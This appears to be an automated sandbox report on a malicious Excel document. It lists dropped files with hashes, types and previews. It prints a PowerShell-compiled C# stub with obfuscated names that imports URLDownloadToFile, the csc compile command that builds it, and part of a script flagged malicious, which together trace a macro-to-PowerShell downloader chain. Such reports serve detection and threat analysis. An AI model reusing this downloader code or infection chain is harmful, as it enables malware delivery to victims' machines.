                                                                                              SHA-256:01C6399FC31B4CBFCF8E851FF3FF433D36B46DA2577F9230B9C78B2CBF790912
                                                                                              SHA-512:7DCA4FB22F5F1A6E08F6C993A7B159863B8B1A8898429AED78582641BC2340CE2FBE3E92F6EC5F9D6EC5C74A14009F77CE87602BEA7BA59C4EA1E092D5A9F8F7
                                                                                              Malicious:false
                                                                                              Preview:..p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .C.r.e.a.t.e.S.e.s.s.i.o.n.(.w.s.m.a.n.,. .c.o.n.S.t.r.,. .o.p.t.D.i.c.,. .a.m.o.r.f.a.n.h.a.r.)..... . . . .d.i.m. .d.e.s.a.m.o.r.t.i.z.a.r.F.l.a.g.s..... . . . .d.i.m. .c.o.n.O.p.t. ..... . . . .d.i.m. .d.e.s.a.m.o.r.t.i.z.a.r..... . . . .d.i.m. .a.u.t.h.V.a.l..... . . . .d.i.m. .e.n.c.o.d.i.n.g.V.a.l..... . . . .d.i.m. .e.n.c.r.y.p.t.V.a.l..... . . . .d.i.m. .p.w..... . . . .d.i.m. .t.o.u.t..... . . . .'. .p.r.o.x.y. .i.n.f.o.r.m.a.t.i.o.n..... . . . .d.i.m. .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e..... . . . .d.i.m. .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e.V.a.l..... . . . .d.i.m. .p.r.o.x.y.A.u.t.h.e.n.t.i.c.a.t.i.o.n.M.e.c.h.a.n.i.s.m..... . . . .d.i.m. .p.r.o.x.y.A.u.t.h.e.n.t.i.c.a.t.i.o.n.M.e.c.h.a.n.i.s.m.V.a.l..... . . . .d.i.m. .p.r.o.x.y.U.s.e.r.n.a.m.e..... . . . .d.i.m. .p.r.o.x.y.P.a.s.s.w.o.r.d..... . . . . ..... . . . .d.e.s.a.m.o.r.t.i.z.a.r.F.l.a.g.s. .=. .0..... . . . .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e. .=. .0..... . . . .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e.V.
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                              Category:dropped
                                                                                              Size (bytes):172076
                                                                                              Entropy (8bit):3.1342558498505824
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:7DqEuvAIid/aQGb1BfUErpxTORWEl+tIL22EZCd:iEuWd/adDrvTUP22Bd
                                                                                              MD5:D85DAC1376E45C58F790BD50C2729F6C
                                                                                              SHA1:5BD339C54A944689935652E4A1CC78961EB19589
                                                                                              SHA-256:CE5CF5334F2BF26B0B3F4B135B2BEA9126CB29DD1C5BED1F558FAA2BFE4C8E48
                                                                                              SHA-512:6B864B3E47331C5C37376B1F9ED7FE1F8D48BE27438DE9C4D7BA3B3ED6ED3F319425E8D696B51C7969AD3C10A7285D7212E59FDDAC8385BCD992A03EF189789A
                                                                                              Malicious:false
                                                                                              Preview:....l..............................eQ.. EMF....,.......$...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...........T...)..............."...!..............?...........?................................'.......................%...................................&...........................%.......
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:very short file (no magic)
                                                                                              Category:dropped
                                                                                              Size (bytes):1
                                                                                              Entropy (8bit):0.0
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:U:U
                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                              Malicious:false
                                                                                              Preview:1
                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Thu Oct 24 19:22:51 2024, 1st section name ".debug$S"
                                                                                              Category:dropped
                                                                                              Size (bytes):1328
                                                                                              Entropy (8bit):3.979698879857167
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:H2e9Eur8KYcdH3wKdNWI+ycuZhNEakSAPNnqSqd:zrgcgKd41ulEa3YqSK
                                                                                              MD5:C0E428AB37AFFEF4DCFAC97392E8603F
                                                                                              SHA1:425C1AA971425A36F72D373C5A3E0306E1A92841
                                                                                              SHA-256:18886A15D19AE5C39A2DD54C2C6066F937E3336442A7D2958C8638A1FF71B7BF
                                                                                              SHA-512:DF64EECDD06A3ED00C316170EDFB82A03768B1A94BA6636A950523A55D136CFFF51BB5C3247010D95C5ADB028D09C034A51291840878E06172F19BE64512B394
                                                                                              Malicious:false
                                                                                              Preview:L......g.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\mgcx3ou4\CSCC6F130116CCE49C39BB61052DD4B9AF.TMP.................%..L.p.U4..y.Q8..........4.......C:\Users\user\AppData\Local\Temp\RESB606.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...m.g.c.x.3.o.u.4...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:very short file (no magic)
                                                                                              Category:dropped
                                                                                              Size (bytes):1
                                                                                              Entropy (8bit):0.0
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:U:U
                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                              Malicious:false
                                                                                              Preview:1
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:very short file (no magic)
                                                                                              Category:dropped
                                                                                              Size (bytes):1
                                                                                              Entropy (8bit):0.0
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:U:U
                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                              Malicious:false
                                                                                              Preview:1
                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                              File Type:MSVC .res
                                                                                              Category:dropped
                                                                                              Size (bytes):652
                                                                                              Entropy (8bit):3.1060952065385106
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryCak7YnqqAPN5Dlq5J:+RI+ycuZhNEakSAPNnqX
                                                                                              MD5:C42580A24CDC70855534A9E079C35138
                                                                                              SHA1:46E338443B93E479394E861B04D69616D3AF3469
                                                                                              SHA-256:2853512183B58085E792E952C357914E204C2C9B8A3C162B5C1235EDDE412CA2
                                                                                              SHA-512:F31C2E9F314F13F8EA005932574D6BB9CE18756D62ED82086FD40B4709BAF689648ACB2E1240B45341FBC4A57CF963FC21EA0307D8EE1A21DDAAFF9B71C8DEDB
                                                                                              Malicious:false
                                                                                              Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...m.g.c.x.3.o.u.4...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.g.c.x.3.o.u.4...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (356)
                                                                                              Category:dropped
                                                                                              Size (bytes):471
                                                                                              Entropy (8bit):3.812832561152431
                                                                                              Encrypted:false
                                                                                              SSDEEP:6:V/DsYLDS81zugnYvtIXemMGtJQXReKJ8SRHy4HEmIZ1bp7Rty:V/DTLDfuiCRbXfHoh1Xy
                                                                                              MD5:465B774D7A1A641088FF65CB56D1755B
                                                                                              SHA1:D65FF3C3ECD67B7DA02D199D649ABB75A8C64879
                                                                                              SHA-256:737CEB1CFF20744C7D2EB5139717221CF2C96F10D05D5FFFD3D916FD69A6D025
                                                                                              SHA-512:665F11DFA5A6A79B89C49724AD1943BAEA2EA54CB204EF3712ABB948218064410B42EE96B29F067FC635BC71EC85295603567BF2E9121D381FA2DFBC6C07EA68
                                                                                              Malicious:false
                                                                                              Preview:.using System;.using System.Runtime.InteropServices;..namespace YwoBcGOgni.{. public class S. {. [DllImport("urLmOn.DlL", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr zlGgjppE,string DYBlW,string pIyGVu,uint k,IntPtr OITihJRyY);.. }..}.
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):369
                                                                                              Entropy (8bit):5.243233466077736
                                                                                              Encrypted:false
                                                                                              SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23frQG+zxs7+AEszIP23frQcn:p37Lvkmb6KzcG+WZEocc
                                                                                              MD5:E548347EE8EFCA63174A54CC444905DB
                                                                                              SHA1:B38DDE389162258EDDEEE33BDDE132AA23BB6411
                                                                                              SHA-256:57B8E2CB1A584FF3136B5BFFD970C9A3DEF41A14D119039686B985E4E556016E
                                                                                              SHA-512:D2FFF3C8918437B191BE62CDA089A77DEE67F6C8DF05721A26FDC3242B0B1269A6A1D0A8B76D05C6555C7B3A35F9AEDF5482494894307D3BD838916630753E1F
                                                                                              Malicious:true
                                                                                              Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\mgcx3ou4\mgcx3ou4.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\mgcx3ou4\mgcx3ou4.0.cs"
                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):3072
                                                                                              Entropy (8bit):2.827026584265545
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:etGSQPBe5ekrl8c2lOkfdkOtkZf+RbCZ0WI+ycuZhNEakSAPNnq:6fskr+/lSBJ+RbCZX1ulEa3Yq
                                                                                              MD5:0ED4EDE2F77BAF8C50E9CDD8507CCDD2
                                                                                              SHA1:EBAF3364F4BA8F8B84D94C2E6D98F72F829BF44A
                                                                                              SHA-256:00F8F94D686B0F8933D86F24F72DC046EF694D840ACD4BBC77EB887D76035F00
                                                                                              SHA-512:8CDAF4C29BA5A21ED68BAF84D0307535BF79DFCAC7BE48B065CB36B401E62B91F457134ACB58BB371AD44746AE58602773809478C1D4D001A38777D8F52E673F
                                                                                              Malicious:false
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g...........!.................#... ...@....... ....................................@.................................\#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................4.-.....u.....u.......................................... ;.....P ......M.........S.....\.....b.....i.....k...M.....M...!.M.....M.......!.....*.......;.......................................$..........<Module>.mg
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                                                              Category:modified
                                                                                              Size (bytes):866
                                                                                              Entropy (8bit):5.33524063267165
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:AId3ka6KzZ/EoEKaMD5DqBVKVrdFAMBJTH:Akka60FEoEKdDcVKdBJj
                                                                                              MD5:4EEAA3D3640F6514D87261BF2AFE0722
                                                                                              SHA1:3EF512CB8CC35E6BA90DAF53006C594083382F0B
                                                                                              SHA-256:ED0A4A6473AFF838C986790F84443D08443DE92A29C30D38A5934858F5AD9766
                                                                                              SHA-512:D3A56B7154DDECF35663F3A828D21BFFA9EFEC7261C731C9FA1D97B80D75B0FC591E9D9E6F692019B1073E11488532714E5DD331450A0B457B3590B5259011BD
                                                                                              Malicious:false
                                                                                              Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\mgcx3ou4\mgcx3ou4.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\mgcx3ou4\mgcx3ou4.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:very short file (no magic)
                                                                                              Category:dropped
                                                                                              Size (bytes):1
                                                                                              Entropy (8bit):0.0
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:U:U
                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                              Malicious:false
                                                                                              Preview:1
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:very short file (no magic)
                                                                                              Category:dropped
                                                                                              Size (bytes):1
                                                                                              Entropy (8bit):0.0
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:U:U
                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                              Malicious:false
                                                                                              Preview:1
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:very short file (no magic)
                                                                                              Category:dropped
                                                                                              Size (bytes):1
                                                                                              Entropy (8bit):0.0
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:U:U
                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                              Malicious:false
                                                                                              Preview:1
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:very short file (no magic)
                                                                                              Category:dropped
                                                                                              Size (bytes):1
                                                                                              Entropy (8bit):0.0
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:U:U
                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                              Malicious:false
                                                                                              Preview:1
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:very short file (no magic)
                                                                                              Category:dropped
                                                                                              Size (bytes):1
                                                                                              Entropy (8bit):0.0
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:U:U
                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                              Malicious:false
                                                                                              Preview:1
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):512
                                                                                              Entropy (8bit):0.0
                                                                                              Encrypted:false
                                                                                              SSDEEP:3::
                                                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                              Malicious:false
                                                                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):512
                                                                                              Entropy (8bit):0.0
                                                                                              Encrypted:false
                                                                                              SSDEEP:3::
                                                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                              Malicious:false
                                                                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                              File Type:very short file (no magic)
                                                                                              Category:dropped
                                                                                              Size (bytes):1
                                                                                              Entropy (8bit):0.0
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:U:U
                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                              Malicious:false
                                                                                              Preview:1
                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                              File Type:data
                                                                                              Category:modified
                                                                                              Size (bytes):46
                                                                                              Entropy (8bit):1.0424600748477153
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:/lbWwWl:sZ
                                                                                              MD5:3B7B4F5326139F48EFA0AAE509E2FE58
                                                                                              SHA1:209A1CE7AF7FF28CCD52AE9C8A89DEE5F2C1D57A
                                                                                              SHA-256:D47B073BF489AB75A26EBF82ABA0DAB7A484F83F8200AB85EBD57BED472022FC
                                                                                              SHA-512:C99D99EA71E54629815099464A233E7617E4E118DD5B2A7A32CF41141CB9815DF47B0A40D1A9F89980C307596B53DD63F76DD52CF10EE21F47C635C5F68786B5
                                                                                              Malicious:false
                                                                                              Preview:........................................user.
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):141118
                                                                                              Entropy (8bit):3.6910993454239835
                                                                                              Encrypted:false
                                                                                              SSDEEP:3072:airLgt5pUGwjz5D7euCuqhYJ5PcJXqlgLR+eAMiKGG2:yYJBc5qlgLAY2
                                                                                              MD5:FE9E18E3366CA7AC8C21EB1CE0631D9C
                                                                                              SHA1:51BC2BC37E87E2D64129CAD63DF697A68EE3B9D6
                                                                                              SHA-256:01C6399FC31B4CBFCF8E851FF3FF433D36B46DA2577F9230B9C78B2CBF790912
                                                                                              SHA-512:7DCA4FB22F5F1A6E08F6C993A7B159863B8B1A8898429AED78582641BC2340CE2FBE3E92F6EC5F9D6EC5C74A14009F77CE87602BEA7BA59C4EA1E092D5A9F8F7
                                                                                              Malicious:true
                                                                                              Preview:..p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .C.r.e.a.t.e.S.e.s.s.i.o.n.(.w.s.m.a.n.,. .c.o.n.S.t.r.,. .o.p.t.D.i.c.,. .a.m.o.r.f.a.n.h.a.r.)..... . . . .d.i.m. .d.e.s.a.m.o.r.t.i.z.a.r.F.l.a.g.s..... . . . .d.i.m. .c.o.n.O.p.t. ..... . . . .d.i.m. .d.e.s.a.m.o.r.t.i.z.a.r..... . . . .d.i.m. .a.u.t.h.V.a.l..... . . . .d.i.m. .e.n.c.o.d.i.n.g.V.a.l..... . . . .d.i.m. .e.n.c.r.y.p.t.V.a.l..... . . . .d.i.m. .p.w..... . . . .d.i.m. .t.o.u.t..... . . . .'. .p.r.o.x.y. .i.n.f.o.r.m.a.t.i.o.n..... . . . .d.i.m. .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e..... . . . .d.i.m. .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e.V.a.l..... . . . .d.i.m. .p.r.o.x.y.A.u.t.h.e.n.t.i.c.a.t.i.o.n.M.e.c.h.a.n.i.s.m..... . . . .d.i.m. .p.r.o.x.y.A.u.t.h.e.n.t.i.c.a.t.i.o.n.M.e.c.h.a.n.i.s.m.V.a.l..... . . . .d.i.m. .p.r.o.x.y.U.s.e.r.n.a.m.e..... . . . .d.i.m. .p.r.o.x.y.P.a.s.s.w.o.r.d..... . . . . ..... . . . .d.e.s.a.m.o.r.t.i.z.a.r.F.l.a.g.s. .=. .0..... . . . .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e. .=. .0..... . . . .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e.V.
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Oct 24 20:22:56 2024, Security: 1
                                                                                              Category:dropped
                                                                                              Size (bytes):91136
                                                                                              Entropy (8bit):7.808933670572312
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:FiqHy1S6F8b2SQrEkawpoXIo8GP+YQoiFOWnfjuwLvLz8F5jKH:feFHrE2sIoj+fjuwLvXd
                                                                                              MD5:E5251EA26FDFD63A7FE679E4FA68B708
                                                                                              SHA1:50C2B85B1E6A21F80CD1639740405565CAB5B487
                                                                                              SHA-256:08BA40FED3059D148C06A140047C40946FD866947C20A2F4AB8774371BBAD70E
                                                                                              SHA-512:41791F74D261C793E395FB173B8E722D035328CEDD24B75710973549F68CAE3E2F3C71440C0D076F9DCE7B37CC30620EACD1998DFFA7C82CBB2E6792ED377BD6
                                                                                              Malicious:false
                                                                                              Preview:......................>...................................N...................P........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...................R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):26
                                                                                              Entropy (8bit):3.95006375643621
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                              Malicious:false
                                                                                              Preview:[ZoneTransfer]....ZoneId=0
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Oct 24 20:22:56 2024, Security: 1
                                                                                              Category:dropped
                                                                                              Size (bytes):91136
                                                                                              Entropy (8bit):7.808933670572312
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:FiqHy1S6F8b2SQrEkawpoXIo8GP+YQoiFOWnfjuwLvLz8F5jKH:feFHrE2sIoj+fjuwLvXd
                                                                                              MD5:E5251EA26FDFD63A7FE679E4FA68B708
                                                                                              SHA1:50C2B85B1E6A21F80CD1639740405565CAB5B487
                                                                                              SHA-256:08BA40FED3059D148C06A140047C40946FD866947C20A2F4AB8774371BBAD70E
                                                                                              SHA-512:41791F74D261C793E395FB173B8E722D035328CEDD24B75710973549F68CAE3E2F3C71440C0D076F9DCE7B37CC30620EACD1998DFFA7C82CBB2E6792ED377BD6
                                                                                              Malicious:false
                                                                                              Preview:......................>...................................N...................P........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...................R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                              File Type:data
                                                                                              Category:modified
                                                                                              Size (bytes):165
                                                                                              Entropy (8bit):1.4377382811115937
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:vZ/FFDJw2fV:vBFFGS
